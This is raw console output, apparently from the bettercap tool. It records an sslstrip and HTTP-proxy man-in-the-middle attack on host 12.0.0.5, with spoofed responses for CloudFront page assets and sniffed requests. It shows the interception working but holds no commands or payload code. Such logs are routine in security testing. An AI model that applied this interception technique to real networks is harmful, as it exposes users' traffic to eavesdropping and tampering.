 12.0.0.0/24 > 12.0.0.4  » [08:13:02] [http.proxy.spoofed-response] {http.proxy.spoofed-response 2019-04-22 08:13:02.755848648 +0200 CEST m=+29.740077811 { GET d2k1ftgv7pobq7.cloudfront.net /meta/p/res/images/83b3c2b3542d1ce997306dd2c76a898d/logo-kickstarter.svg 5109}}
 12.0.0.0/24 > 12.0.0.4  » [08:13:02] [http.proxy.spoofed-response] {http.proxy.spoofed-response 2019-04-22 08:13:02.78152866 +0200 CEST m=+29.765638780 { GET d2k1ftgv7pobq7.cloudfront.net /meta/p/res/images/42feb2498e08d8fbd357e19d331da908/logo-adobe.svg 5109}}
 12.0.0.0/24 > 12.0.0.4  » [08:13:02] [sys.log] [inf] [sslstrip] Replacing host wwww.d2k1ftgv7pobq7.cloudfront.net with d2k1ftgv7pobq7.cloudfront.net in request from 12.0.0.5:35364
 12.0.0.0/24 > 12.0.0.4  » [08:13:02] [http.proxy.spoofed-response] {http.proxy.spoofed-response 2019-04-22 08:13:02.796326 +0200 CEST m=+29.780436105 { GET d2k1ftgv7pobq7.cloudfront.net /meta/p/res/images/4838c7256b43105d3abe0631ac1bb72c/logo-google.svg 5109}}
 12.0.0.0/24 > 12.0.0.4  » [08:13:02] [sys.log] [inf] [sslstrip] Replacing host wwww.d2k1ftgv7pobq7.cloudfront.net with d2k1ftgv7pobq7.cloudfront.net in request from 12.0.0.5:35362
 12.0.0.0/24 > 12.0.0.4  » [08:13:02] [http.proxy.spoofed-response] {http.proxy.spoofed-response 2019-04-22 08:13:02.803786447 +0200 CEST m=+29.787896591 { GET d2k1ftgv7pobq7.cloudfront.net /meta/p/res/images/99b35981e7c571708532ba39f0764aeb/logo-national-geographic.svg 5109}}
 12.0.0.0/24 > 12.0.0.4  » [08:13:02] [http.proxy.spoofed-request] {http.proxy.spoofed-request 2019-04-22 08:13:02.819165091 +0200 CEST m=+29.803275176 {12.0.0.5 GET d2k1ftgv7pobq7.cloudfront.net /meta/p/res/images/759e9aaacc706fd1f2d5f81b1a76b768/logo-fender.svg 0}}
 12.0.0.0/24 > 12.0.0.4  » [08:13:02] [http.proxy.spoofed-request] {http.proxy.spoofed-request 2019-04-22 08:13:02.822960122 +0200 CEST m=+29.807070228 {12.0.0.5 GET d2k1ftgv7pobq7.cloudfront.net /meta/p/res/images/e4e8fa01ba058bce8e9f2bb7459516f9/atlassian-logo-white-small.svg 0}}
 12.0.0.0/24 > 12.0.0.4  » [08:13:02] [http.proxy.spoofed-request] {http.proxy.spoofed-request 2019-04-22 08:13:02.8375379 +0200 CEST m=+29.821648043 {12.0.0.5 GET d2k1ftgv7pobq7.cloudfront.net /meta/p/res/js/analytics/096a222ccf04c0ac8ba7d4de4fa42406/googleAnalytics.js 0}}
 12.0.0.0/24 > 12.0.0.4  » [08:13:02] [http.proxy.spoofed-request] {http.proxy.spoofed-request 2019-04-22 08:13:02.857963436 +0200 CEST m=+29.842073575 {12.0.0.5 GET d2k1ftgv7pobq7.cloudfront.net /meta/p/res/images/6cdbcb3dcf82bba860f1768d184161ee/atlassian-logo-gray-small.svg 0}}
 12.0.0.0/24 > 12.0.0.4  » [08:13:02] [http.proxy.spoofed-response] {http.proxy.spoofed-response 2019-04-22 08:13:02.889762595 +0200 CEST m=+29.873872708 { GET d2k1ftgv7pobq7.cloudfront.net /meta/p/res/images/759e9aaacc706fd1f2d5f81b1a76b768/logo-fender.svg 5109}}
 12.0.0.0/24 > 12.0.0.4  » [08:13:02] [http.proxy.spoofed-response] {http.proxy.spoofed-response 2019-04-22 08:13:02.904581406 +0200 CEST m=+29.888691517 { GET d2k1ftgv7pobq7.cloudfront.net /meta/p/res/images/e4e8fa01ba058bce8e9f2bb7459516f9/atlassian-logo-white-small.svg 5109}}
 12.0.0.0/24 > 12.0.0.4  » [08:13:02] [http.proxy.spoofed-response] {http.proxy.spoofed-response 2019-04-22 08:13:02.922740315 +0200 CEST m=+29.906850436 { GET d2k1ftgv7pobq7.cloudfront.net /meta/p/res/js/analytics/096a222ccf04c0ac8ba7d4de4fa42406/googleAnalytics.js 45925}}
 12.0.0.0/24 > 12.0.0.4  » [08:13:02] [http.proxy.spoofed-response] {http.proxy.spoofed-response 2019-04-22 08:13:02.936461028 +0200 CEST m=+29.920571131 { GET d2k1ftgv7pobq7.cloudfront.net /meta/p/res/images/6cdbcb3dcf82bba860f1768d184161ee/atlassian-logo-gray-small.svg 5109}}
 12.0.0.0/24 > 12.0.0.4  » [08:13:02] [sys.log] [inf] [sslstrip] Replacing host wwww.d2k1ftgv7pobq7.cloudfront.net with d2k1ftgv7pobq7.cloudfront.net in request from 12.0.0.5:35360
 12.0.0.0/24 > 12.0.0.4  » [08:13:02] [sys.log] [inf] [sslstrip] Replacing host wwww.d2k1ftgv7pobq7.cloudfront.net with d2k1ftgv7pobq7.cloudfront.net in request from 12.0.0.5:35354
 12.0.0.0/24 > 12.0.0.4  » [08:13:02] [http.proxy.spoofed-response] {http.proxy.spoofed-response 2019-04-22 08:13:02.956778736 +0200 CEST m=+29.940888859 {12.0.0.5 GET d2k1ftgv7pobq7.cloudfront.net /meta/p/res/js/02b80d97c3394f2fc3b0c753bd156c9b/cookiec.min.js 45925}}
 12.0.0.0/24 > 12.0.0.4  » [08:13:02] [http.proxy.spoofed-request] {http.proxy.spoofed-request 2019-04-22 08:13:02.990030136 +0200 CEST m=+29.974140204 {12.0.0.5 GET d2k1ftgv7pobq7.cloudfront.net /meta/p/res/js/analytics/baea605d19ee1e1df56bbee0b9fbb84b/googleTagManager.js 0}}
 12.0.0.0/24 > 12.0.0.4  » [08:13:02] [net.sniff.http.request] http 12.0.0.5 GET wwww.d2k1ftgv7pobq7.cloudfront.net/meta/p/res/images/bcde9868a665af4ab4efe460c46fbc7b/btn-playstore-black.png
 12.0.0.0/24 > 12.0.0.4  » [08:13:02] [net.sniff.http.response] http 54.192.62.238:80 403 Forbidden -> 12.0.0.5 (2.1 kB text/html)
 12.0.0.0/24 > 12.0.0.4  » [08:13:02] [net.sniff.http.request] http 12.0.0.5 GET wwww.d2k1ftgv7pobq7.cloudfront.net/meta/p/res/js/02b80d97c3394f2fc3b0c753bd156c9b/cookiec.min.js
 12.0.0.0/24 > 12.0.0.4  » [08:13:02] [net.sniff.http.response] http 54.192.62.238:80 403 Forbidden -> 12.0.0.5 (3.3 kB text/html)
 [08:13:03] [net.sniff.http.response] http 54.192.62.238:80 403 Forbidden -> 12.0.0.5 (2.1 kB text/html)
 12.0.0.0/24 > 12.0.0.4  » [08:13:03] [net.sniff.http.request] http 12.0.0.5 GET wwww.d2k1ftgv7pobq7.cloudfront.net/meta/p/res/images/42feb2498e08d8fbd357e19d331da908/logo-adobe.svg
 12.0.0.0/24 > 12.0.0.4  » [08:13:02] [net.sniff.http.response] http 54.192.62.238:80 403 Forbidden -> 12.0.0.5 (3.3 kB text/html)
 [08:13:03] [net.sniff.http.request] http 12.0.0.5 GET wwww.d2k1ftgv7pobq7.cloudfront.net/meta/p/res/images/83b3c2b3542d1ce997306dd2c76a898d/logo-kickstarter.svg
 12.0.0.0/24 > 12.0.0.4  » [08:13:03] [net.sniff.http.response] http 54.192.62.238:80 403 Forbidden -> 12.0.0.5 (3.3 kB text/html)
 12.0.0.0/24 > 12.0.0.4  » [08:13:03] [net.sniff.http.request] http 12.0.0.5 GET wwww.d2k1ftgv7pobq7.cloudfront.net/meta/p/res/images/99b35981e7c571708532ba39f0764aeb/logo-national-geographic.svg
 12.0.0.0/24 > 12.0.0.4  » [08:13:03] [net.sniff.http.response] http 54.192.62.238:80 403 Forbidden -> 12.0.0.5 (2.1 kB text/html)
 12.0.0.0/24 > 12.0.0.4  » [08:13:03] [net.sniff.http.request] http 12.0.0.5 GET wwww.d2k1ftgv7pobq7.cloudfront.net/meta/p/res/images/4838c7256b43105d3abe0631ac1bb72c/logo-google.svg
 12.0.0.0/24 > 12.0.0.4  » [08:13:03] [net.sniff.http.response] http 54.192.62.238:80 403 Forbidden -> 12.0.0.5 (2.1 kB text/html)
 12.0.0.0/24 > 12.0.0.4  » [08:13:03] [net.sniff.http.request] http 12.0.0.5 GET wwww.d2k1ftgv7pobq7.cloudfront.net/meta/p/res/images/759e9aaacc706fd1f2d5f81b1a76b768/logo-fender.svg
 12.0.0.0/24 > 12.0.0.4  » [08:13:03] [net.sniff.http.response] http 54.192.62.238:80 403 Forbidden -> 12.0.0.5 (3.3 kB text/html)
 12.0.0.0/24 > 12.0.0.4  » [08:13:03] [net.sniff.http.response] http 54.192.62.238:80 403 Forbidden -> 12.0.0.5 (2.1 kB text/html)
 12.0.0.0/24 > 12.0.0.4  » [08:13:03] [net.sniff.http.request] http 12.0.0.5 GET wwww.d2k1ftgv7pobq7.cloudfront.net/meta/p/res/images/e4e8fa01ba058bce8e9f2bb7459516f9/atlassian-logo-white-smal...
 12.0.0.0/24 > 12.0.0.4  » [08:13:03] [http.proxy.spoofed-response] {http.proxy.spoofed-response 2019-04-22 08:13:03.062663378 +0200 CEST m=+30.046773469 { GET d2k1ftgv7pobq7.cloudfront.net /meta/p/res/js/analytics/baea605d19ee1e1df56bbee0b9fbb84b/googleTagManager.js 45925}}
 12.0.0.0/24 > 12.0.0.4  » [08:13:03] [net.sniff.http.request] http 12.0.0.5 GET wwww.d2k1ftgv7pobq7.cloudfront.net/meta/p/res/js/analytics/096a222ccf04c0ac8ba7d4de4fa42406/googleAnalytics.js
 12.0.0.0/24 > 12.0.0.4  » [08:13:03] [net.sniff.http.request] http 12.0.0.5 GET wwww.d2k1ftgv7pobq7.cloudfront.net/meta/p/res/images/6cdbcb3dcf82bba860f1768d184161ee/atlassian-logo-gray-small...
 12.0.0.0/24 > 12.0.0.4  » [08:13:03] [net.sniff.http.response] http 54.192.62.238:80 403 Forbidden -> 12.0.0.5 (3.3 kB text/html)
 12.0.0.0/24 > 12.0.0.4  » [08:13:03] [http.proxy.spoofed-response] {http.proxy.spoofed-response 2019-04-22 08:13:03.084547331 +0200 CEST m=+30.068657543 {12.0.0.5 GET d2k1ftgv7pobq7.cloudfront.net /meta/p/res/js/analytics/096a222ccf04c0ac8ba7d4de4fa42406/googleAnalytics.js 45925}}
 12.0.0.0/24 > 12.0.0.4  » [08:13:03] [net.sniff.http.response] http 54.192.62.238:80 403 Forbidden -> 12.0.0.5 (2.1 kB text/html)
 12.0.0.0/24 > 12.0.0.4  » [08:13:03] [net.sniff.http.request] http 12.0.0.5 GET wwww.d2k1ftgv7pobq7.cloudfront.net/meta/p/res/js/02b80d97c3394f2fc3b0c753bd156c9b/cookiec.min.js
 12.0.0.0/24 > 12.0.0.4  » [08:13:03] [net.sniff.http.response] http 54.192.62.238:80 403 Forbidden -> 12.0.0.5 (3.3 kB text/html)
 12.0.0.0/24 > 12.0.0.4  » [08:13:03] [net.sniff.http.response] http 54.192.62.238:80 403 Forbidden -> 12.0.0.5 (3.3 kB text/html)
 12.0.0.0/24 > 12.0.0.4  » [08:13:03] [net.sniff.http.response] http 54.192.62.238:80 403 Forbidden -> 12.0.0.5 (3.3 kB text/html)
 12.0.0.0/24 > 12.0.0.4  » [08:13:03] [net.sniff.http.response] http 54.192.62.238:80 403 Forbidden -> 12.0.0.5 (2.1 kB text/html)
 12.0.0.0/24 > 12.0.0.4  » [08:13:03] [sys.log] [inf] [sslstrip] Replacing host wwww.d2k1ftgv7pobq7.cloudfront.net with d2k1ftgv7pobq7.cloudfront.net in request from 12.0.0.5:35366
 12.0.0.0/24 > 12.0.0.4  » [08:13:03] [http.proxy.spoofed-request] {http.proxy.spoofed-request 2019-04-22 08:13:03.114169218 +0200 CEST m=+30.098279296 {12.0.0.5 GET d2k1ftgv7pobq7.cloudfront.net /meta/p/res/js/analytics/f822f0dbdc0e029ded2c8266ab726cc8/snowplow.js 0}}
 12.0.0.0/24 > 12.0.0.4  » [08:13:03] [net.sniff.http.request] http 12.0.0.5 GET wwww.d2k1ftgv7pobq7.cloudfront.net/meta/p/res/js/analytics/baea605d19ee1e1df56bbee0b9fbb84b/googleTagManager.js
 12.0.0.0/24 > 12.0.0.4  » [08:13:03] [net.sniff.http.response] http 54.192.62.238:80 403 Forbidden -> 12.0.0.5 (3.3 kB text/html)
 12.0.0.0/24 > 12.0.0.4  » [08:13:03] [net.sniff.http.request] http 12.0.0.5 GET wwww.d2k1ftgv7pobq7.cloudfront.net/meta/p/res/js/analytics/096a222ccf04c0ac8ba7d4de4fa42406/googleAnalytics.js
 12.0.0.0/24 > 12.0.0.4  » [08:13:03] [net.sniff.http.response] http 54.192.62.238:80 403 Forbidden -> 12.0.0.5 (2.1 kB text/html)
 12.0.0.0/24 > 12.0.0.4  » [08:13:03] [sys.log] [inf] [sslstrip] Replacing host wwww.d2k1ftgv7pobq7.cloudfront.net with d2k1ftgv7pobq7.cloudfront.net in request from 12.0.0.5:35356
 12.0.0.0/24 > 12.0.0.4  » [08:13:03] [http.proxy.spoofed-response] {http.proxy.spoofed-response 2019-04-22 08:13:03.180532319 +0200 CEST m=+30.164642451 { GET d2k1ftgv7pobq7.cloudfront.net /meta/p/res/js/analytics/f822f0dbdc0e029ded2c8266ab726cc8/snowplow.js 45925}}
 12.0.0.0/24 > 12.0.0.4  » [08:13:03] [http.proxy.spoofed-response] {http.proxy.spoofed-response 2019-04-22 08:13:03.187054858 +0200 CEST m=+30.171164998 {12.0.0.5 GET d2k1ftgv7pobq7.cloudfront.net /meta/p/res/js/analytics/baea605d19ee1e1df56bbee0b9fbb84b/googleTagManager.js 45925}}
 12.0.0.0/24 > 12.0.0.4  » [08:13:03] [sys.log] [inf] [sslstrip] Replacing host wwww.d2k1ftgv7pobq7.cloudfront.net with d2k1ftgv7pobq7.cloudfront.net in request from 12.0.0.5:35366
 12.0.0.0/24 > 12.0.0.4  » [08:13:03] [sys.log] [inf] [sslstrip] Replacing host wwww.d2k1ftgv7pobq7.cloudfront.net with d2k1ftgv7pobq7.cloudfront.net in request from 12.0.0.5:35368
 12.0.0.0/24 > 12.0.0.4  » [08:13:03] [http.proxy.spoofed-request] {http.proxy.spoofed-request 2019-04-22 08:13:03.229695901 +0200 CEST m=+30.213805988 {12.0.0.5 GET d2k1ftgv7pobq7.cloudfront.net /meta/p/res/images/6eaaf5e37ab67a8ed6cd7764660513b9/updated-layouts-sync.png 0}}
 12.0.0.0/24 > 12.0.0.4  » [08:13:03] [sys.log] [inf] [sslstrip] Replacing host wwww.d2k1ftgv7pobq7.cloudfront.net with d2k1ftgv7pobq7.cloudfront.net in request from 12.0.0.5:35356
 12.0.0.0/24 > 12.0.0.4  » [08:13:03] [http.proxy.spoofed-request] {http.proxy.spoofed-request 2019-04-22 08:13:03.260070153 +0200 CEST m=+30.244180283 {12.0.0.5 GET d2k1ftgv7pobq7.cloudfront.net /meta/p/res/images/15e77c8347135120a438d17e38195e44/updated-layouts-platform.png 0}}
 12.0.0.0/24 > 12.0.0.4  » [08:13:03] [http.proxy.spoofed-request] {http.proxy.spoofed-request 2019-04-22 08:13:03.279683454 +0200 CEST m=+30.263793552 {12.0.0.5 GET d2k1ftgv7pobq7.cloudfront.net /meta/p/res/images/0cad30a99820b0d840a5b48635d00b6e/updated-layouts-collab.png 0}}
 12.0.0.0/24 > 12.0.0.4  » [08:13:03] [sys.log] [inf] [sslstrip] Replacing host wwww.d2k1ftgv7pobq7.cloudfront.net with d2k1ftgv7pobq7.cloudfront.net in request from 12.0.0.5:35360
 12.0.0.0/24 > 12.0.0.4  » [08:13:03] [sys.log] [inf] [sslstrip] Replacing host wwww.d2k1ftgv7pobq7.cloudfront.net with d2k1ftgv7pobq7.cloudfront.net in request from 12.0.0.5:35354
 12.0.0.0/24 > 12.0.0.4  » [08:13:03] [http.proxy.spoofed-request] {http.proxy.spoofed-request 2019-04-22 08:13:03.295819261 +0200 CEST m=+30.279929385 {12.0.0.5 GET d2k1ftgv7pobq7.cloudfront.net /meta/p/res/images/308998dcb3ed5ab3d01217a4d24ffa03/hero-a.svg 0}}
 12.0.0.0/24 > 12.0.0.4  » [08:13:03] [http.proxy.spoofed-response] {http.proxy.spoofed-response 2019-04-22 08:13:03.304234402 +0200 CEST m=+30.288344483 { GET d2k1ftgv7pobq7.cloudfront.net /meta/p/res/images/6eaaf5e37ab67a8ed6cd7764660513b9/updated-layouts-sync.png 5109}}
 12.0.0.0/24 > 12.0.0.4  » [08:13:03] [sys.log] [inf] [sslstrip] Replacing host wwww.d2k1ftgv7pobq7.cloudfront.net with d2k1ftgv7pobq7.cloudfront.net in request from 12.0.0.5:35370
 12.0.0.0/24 > 12.0.0.4  » [08:13:03] [sys.log] [inf] [sslstrip] Replacing host wwww.d2k1ftgv7pobq7.cloudfront.net with d2k1ftgv7pobq7.cloudfront.net in request from 12.0.0.5:35368
 12.0.0.0/24 > 12.0.0.4  » [08:13:03] [http.proxy.spoofed-response] {http.proxy.spoofed-response 2019-04-22 08:13:03.376390051 +0200 CEST m=+30.360500194 { GET d2k1ftgv7pobq7.cloudfront.net /meta/p/res/images/15e77c8347135120a438d17e38195e44/updated-layouts-platform.png 5109}}
 12.0.0.0/24 > 12.0.0.4  » [08:13:03] [http.proxy.spoofed-response] {http.proxy.spoofed-response 2019-04-22 08:13:03.386752214 +0200 CEST m=+30.370862314 { GET d2k1ftgv7pobq7.cloudfront.net /meta/p/res/images/0cad30a99820b0d840a5b48635d00b6e/updated-layouts-collab.png 5109}}
 12.0.0.0/24 > 12.0.0.4  » [08:13:03] [sys.log] [inf] [sslstrip] Replacing host wwww.d2k1ftgv7pobq7.cloudfront.net with d2k1ftgv7pobq7.cloudfront.net in request from 12.0.0.5:35372
 12.0.0.0/24 > 12.0.0.4  » [08:13:03] [sys.log] [inf] [sslstrip] Replacing host wwww.d2k1ftgv7pobq7.cloudfront.net with d2k1ftgv7pobq7.cloudfront.net in request from 12.0.0.5:35374
 12.0.0.0/24 > 12.0.0.4  » [08:13:03] [http.proxy.spoofed-response] {http.proxy.spoofed-response 2019-04-22 08:13:03.447086618 +0200 CEST m=+30.431196705 { GET d2k1ftgv7pobq7.cloudfront.net /meta/p/res/images/308998dcb3ed5ab3d01217a4d24ffa03/hero-a.svg 5109}}
 12.0.0.0/24 > 12.0.0.4  » [08:13:03] [http.proxy.spoofed-request] {http.proxy.spoofed-request 2019-04-22 08:13:03.455342786 +0200 CEST m=+30.439452904 {12.0.0.5 GET d2k1ftgv7pobq7.cloudfront.net /meta/p/res/js/67806f9ff1ce059372fafdc52c3073c2/jquery.min.js 0}}
 12.0.0.0/24 > 12.0.0.4  » [08:13:03] [sys.log] [inf] [sslstrip] Replacing host wwww.d2k1ftgv7pobq7.cloudfront.net with d2k1ftgv7pobq7.cloudfront.net in request from 12.0.0.5:35360
 12.0.0.0/24 > 12.0.0.4  » [08:13:03] [sys.log] [inf] [sslstrip] Replacing host wwww.d2k1ftgv7pobq7.cloudfront.net with d2k1ftgv7pobq7.cloudfront.net in request from 12.0.0.5:35382
 12.0.0.0/24 > 12.0.0.4  » [08:13:03] [sys.log] [inf] [sslstrip] Replacing host wwww.d2k1ftgv7pobq7.cloudfront.net with d2k1ftgv7pobq7.cloudfront.net in request from 12.0.0.5:35362
 12.0.0.0/24 > 12.0.0.4  » [08:13:03] [http.proxy.spoofed-request] {http.proxy.spoofed-request 2019-04-22 08:13:03.452291521 +0200 CEST m=+30.436401616 {12.0.0.5 GET d2k1ftgv7pobq7.cloudfront.net /meta/p/res/fonts/charlie-text/b7e8ae700922f44a87cf9bfa816f47f3/Charlie_Text-Regular.woff 0}}
 12.0.0.0/24 > 12.0.0.4  » [08:13:03] [sys.log] [inf] [sslstrip] Replacing host wwww.d2k1ftgv7pobq7.cloudfront.net with d2k1ftgv7pobq7.cloudfront.net in request from 12.0.0.5:35376
 12.0.0.0/24 > 12.0.0.4  » [08:13:03] [sys.log] [inf] [sslstrip] Replacing host wwww.d2k1ftgv7pobq7.cloudfront.net with d2k1ftgv7pobq7.cloudfront.net in request from 12.0.0.5:35378
 12.0.0.0/24 > 12.0.0.4  » [08:13:03] [sys.log] [inf] [sslstrip] Replacing host wwww.d2k1ftgv7pobq7.cloudfront.net with d2k1ftgv7pobq7.cloudfront.net in request from 12.0.0.5:35380
 12.0.0.0/24 > 12.0.0.4  » [08:13:03] [net.sniff.http.response] http 54.192.62.238:80 403 Forbidden -> 12.0.0.5 (3.3 kB text/html)
 12.0.0.0/24 > 12.0.0.4  » [08:13:03] [http.proxy.spoofed-response] {http.proxy.spoofed-response 2019-04-22 08:13:03.637612977 +0200 CEST m=+30.621723094 {12.0.0.5 GET d2k1ftgv7pobq7.cloudfront.net /meta/p/res/js/analytics/f822f0dbdc0e029ded2c8266ab726cc8/snowplow.js 45925}}
 12.0.0.0/24 > 12.0.0.4  » [08:13:03] [http.proxy.spoofed-request] {http.proxy.spoofed-request 2019-04-22 08:13:03.641566523 +0200 CEST m=+30.625676645 {12.0.0.5 GET d2k1ftgv7pobq7.cloudfront.net /meta/p/res/fonts/charlie-display/aa4aa85c7ef84dd4cb06bba4cd08a1b6/Charlie_Display-Semibold.woff 0}}
 12.0.0.0/24 > 12.0.0.4  » [08:13:03] [http.proxy.spoofed-request] {http.proxy.spoofed-request 2019-04-22 08:13:03.645442602 +0200 CEST m=+30.629552691 {12.0.0.5 GET d2k1ftgv7pobq7.cloudfront.net /meta/p/res/fonts/charlie-text/42fcf8750a4eb107bc7abd7015b8cc87/Charlie_Text-Light.woff 0}}
 12.0.0.0/24 > 12.0.0.4  » [08:13:03] [http.proxy.spoofed-request] {http.proxy.spoofed-request 2019-04-22 08:13:03.679475266 +0200 CEST m=+30.663585400 {12.0.0.5 GET d2k1ftgv7pobq7.cloudfront.net /meta/p/res/images/42feb2498e08d8fbd357e19d331da908/logo-adobe.svg 0}}
 12.0.0.0/24 > 12.0.0.4  » [08:13:03] [net.sniff.http.response] http 54.192.62.238:80 403 Forbidden -> 12.0.0.5 (3.3 kB text/html)
 12.0.0.0/24 > 12.0.0.4  » [08:13:03] [sys.log] [inf] [sslstrip] Replacing host wwww.d2k1ftgv7pobq7.cloudfront.net with d2k1ftgv7pobq7.cloudfront.net in request from 12.0.0.5:35354
 12.0.0.0/24 > 12.0.0.4  » [08:13:03] [http.proxy.spoofed-request] {http.proxy.spoofed-request 2019-04-22 08:13:03.696303295 +0200 CEST m=+30.680413415 {12.0.0.5 GET d2k1ftgv7pobq7.cloudfront.net /meta/p/res/images/83b3c2b3542d1ce997306dd2c76a898d/logo-kickstarter.svg 0}}
 12.0.0.0/24 > 12.0.0.4  » [08:13:03] [http.proxy.spoofed-request] {http.proxy.spoofed-request 2019-04-22 08:13:03.743478595 +0200 CEST m=+30.727588731 {12.0.0.5 GET d2k1ftgv7pobq7.cloudfront.net /meta/p/res/images/eebf313cb223112b503b7322173b013c/btn-appstore-black.png 0}}
 12.0.0.0/24 > 12.0.0.4  » [08:13:03] [net.sniff.http.request] http 12.0.0.5 GET wwww.d2k1ftgv7pobq7.cloudfront.net/meta/p/res/js/analytics/f822f0dbdc0e029ded2c8266ab726cc8/snowplow.js
 12.0.0.0/24 > 12.0.0.4  » [08:13:03] [http.proxy.spoofed-request] {http.proxy.spoofed-request 2019-04-22 08:13:03.748175966 +0200 CEST m=+30.732286068 {12.0.0.5 GET d2k1ftgv7pobq7.cloudfront.net /meta/p/res/fonts/charlie-text/3f276bfa8963485680427956e6020c3b/Charlie_Text-Bold.woff 0}}
 12.0.0.0/24 > 12.0.0.4  » [08:13:03] [http.proxy.spoofed-request] {http.proxy.spoofed-request 2019-04-22 08:13:03.751185174 +0200 CEST m=+30.735295272 {12.0.0.5 GET d2k1ftgv7pobq7.cloudfront.net /meta/p/res/images/bcde9868a665af4ab4efe460c46fbc7b/btn-playstore-black.png 0}}
 12.0.0.0/24 > 12.0.0.4  » [08:13:03] [net.sniff.http.response] http 54.192.62.238:80 403 Forbidden -> 12.0.0.5 (2.1 kB text/html)
 12.0.0.0/24 > 12.0.0.4  » [08:13:03] [net.sniff.http.request] http 12.0.0.5 GET wwww.d2k1ftgv7pobq7.cloudfront.net/meta/p/res/js/analytics/baea605d19ee1e1df56bbee0b9fbb84b/googleTagManager.js
 12.0.0.0/24 > 12.0.0.4  » [08:13:03] [http.proxy.spoofed-request] {http.proxy.spoofed-request 2019-04-22 08:13:03.761307496 +0200 CEST m=+30.745417599 {12.0.0.5 GET d2k1ftgv7pobq7.cloudfront.net /meta/p/res/fonts/charlie-text/f7510eaae5eb4e52cf90295b6a217659/Charlie_Text-Semibold.woff 0}}
 12.0.0.0/24 > 12.0.0.4  » [08:13:03] [net.sniff.http.response] http 54.192.62.238:80 403 Forbidden -> 12.0.0.5 (3.3 kB text/html)
 12.0.0.0/24 > 12.0.0.4  » [08:13:03] [http.proxy.spoofed-response] {http.proxy.spoofed-response 2019-04-22 08:13:03.786431556 +0200 CEST m=+30.770541674 { GET d2k1ftgv7pobq7.cloudfront.net /meta/p/res/fonts/charlie-text/b7e8ae700922f44a87cf9bfa816f47f3/Charlie_Text-Regular.woff 5109}}
 12.0.0.0/24 > 12.0.0.4  » [08:13:03] [http.proxy.spoofed-response] {http.proxy.spoofed-response 2019-04-22 08:13:03.801650281 +0200 CEST m=+30.785760372 { GET d2k1ftgv7pobq7.cloudfront.net /meta/p/res/fonts/charlie-text/42fcf8750a4eb107bc7abd7015b8cc87/Charlie_Text-Light.woff 5109}}
 12.0.0.0/24 > 12.0.0.4  » [08:13:03] [http.proxy.spoofed-request] {http.proxy.spoofed-request 2019-04-22 08:13:03.806972693 +0200 CEST m=+30.791082911 {12.0.0.5 GET d2k1ftgv7pobq7.cloudfront.net /meta/p/res/images/99b35981e7c571708532ba39f0764aeb/logo-national-geographic.svg 0}}
 12.0.0.0/24 > 12.0.0.4  » [08:13:03] [http.proxy.spoofed-response] {http.proxy.spoofed-response 2019-04-22 08:13:03.826265195 +0200 CEST m=+30.810375309 { GET d2k1ftgv7pobq7.cloudfront.net /meta/p/res/js/67806f9ff1ce059372fafdc52c3073c2/jquery.min.js 45925}}
 12.0.0.0/24 > 12.0.0.4  » [08:13:03] [http.proxy.spoofed-response] {http.proxy.spoofed-response 2019-04-22 08:13:03.891680368 +0200 CEST m=+30.875790506 { GET d2k1ftgv7pobq7.cloudfront.net /meta/p/res/images/83b3c2b3542d1ce997306dd2c76a898d/logo-kickstarter.svg 5109}}
 12.0.0.0/24 > 12.0.0.4  » [08:13:03] [sys.log] [inf] [sslstrip] Replacing host wwww.d2k1ftgv7pobq7.cloudfront.net with d2k1ftgv7pobq7.cloudfront.net in request from 12.0.0.5:35370
 12.0.0.0/24 > 12.0.0.4  » [08:13:03] [net.sniff.http.response] http 54.192.62.238:80 403 Forbidden -> 12.0.0.5 (3.3 kB text/html)
 12.0.0.0/24 > 12.0.0.4  » [08:13:03] [net.sniff.http.request] http 12.0.0.5 GET wwww.d2k1ftgv7pobq7.cloudfront.net/meta/p/res/js/analytics/f822f0dbdc0e029ded2c8266ab726cc8/snowplow.js
 12.0.0.0/24 > 12.0.0.4  » [08:13:03] [net.sniff.http.request] http 12.0.0.5 GET wwww.d2k1ftgv7pobq7.cloudfront.net/meta/p/res/images/308998dcb3ed5ab3d01217a4d24ffa03/hero-a.svg
 12.0.0.0/24 > 12.0.0.4  » [08:13:03] [net.sniff.http.request] http 12.0.0.5 GET wwww.d2k1ftgv7pobq7.cloudfront.net/meta/p/res/images/0cad30a99820b0d840a5b48635d00b6e/updated-layouts-collab.png
 12.0.0.0/24 > 12.0.0.4  » [08:13:03] [net.sniff.http.request] http 12.0.0.5 GET wwww.d2k1ftgv7pobq7.cloudfront.net/meta/p/res/images/15e77c8347135120a438d17e38195e44/updated-layouts-platform.png
 12.0.0.0/24 > 12.0.0.4  » [08:13:03] [net.sniff.http.request] http 12.0.0.5 GET wwww.d2k1ftgv7pobq7.cloudfront.net/meta/p/res/images/6eaaf5e37ab67a8ed6cd7764660513b9/updated-layouts-sync.png
 12.0.0.0/24 > 12.0.0.4  » [08:13:03] [sys.log] [inf] [sslstrip] Replacing host wwww.d2k1ftgv7pobq7.cloudfront.net with d2k1ftgv7pobq7.cloudfront.net in request from 12.0.0.5:35368
 12.0.0.0/24 > 12.0.0.4  » [08:13:03] [net.sniff.http.request] http 12.0.0.5 GET wwww.d2k1ftgv7pobq7.cloudfront.net/meta/p/res/js/67806f9ff1ce059372fafdc52c3073c2/jquery.min.js
 12.0.0.0/24 > 12.0.0.4  » [08:13:03] [sys.log] [inf] [sslstrip] Replacing host wwww.d2k1ftgv7pobq7.cloudfront.net with d2k1ftgv7pobq7.cloudfront.net in request from 12.0.0.5:35374
 12.0.0.0/24 > 12.0.0.4  » [08:13:03] [http.proxy.spoofed-response] {http.proxy.spoofed-response 2019-04-22 08:13:03.908035858 +0200 CEST m=+30.892145967 { GET d2k1ftgv7pobq7.cloudfront.net /meta/p/res/fonts/charlie-display/aa4aa85c7ef84dd4cb06bba4cd08a1b6/Charlie_Display-Semibold.woff 5109}}
 12.0.0.0/24 > 12.0.0.4  » [08:13:03] [http.proxy.spoofed-response] {http.proxy.spoofed-response 2019-04-22 08:13:03.9255373 +0200 CEST m=+30.909647444 { GET d2k1ftgv7pobq7.cloudfront.net /meta/p/res/fonts/charlie-text/3f276bfa8963485680427956e6020c3b/Charlie_Text-Bold.woff 5109}}
 12.0.0.0/24 > 12.0.0.4  » [08:13:03] [net.sniff.http.request] http 12.0.0.5 GET wwww.d2k1ftgv7pobq7.cloudfront.net/meta/p/res/fonts/charlie-text/42fcf8750a4eb107bc7abd7015b8cc87/Charlie_Text-...
